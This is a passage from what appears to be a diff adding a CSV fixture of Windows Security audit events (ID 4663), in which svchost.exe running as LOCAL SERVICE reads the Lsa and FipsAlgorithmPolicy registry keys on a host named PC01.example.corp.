+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452842</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452841</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452840</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452839</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452838</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452837</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452836</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452835</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452834</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452833</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452832</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452831</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452830</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452829</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452828</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452827</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
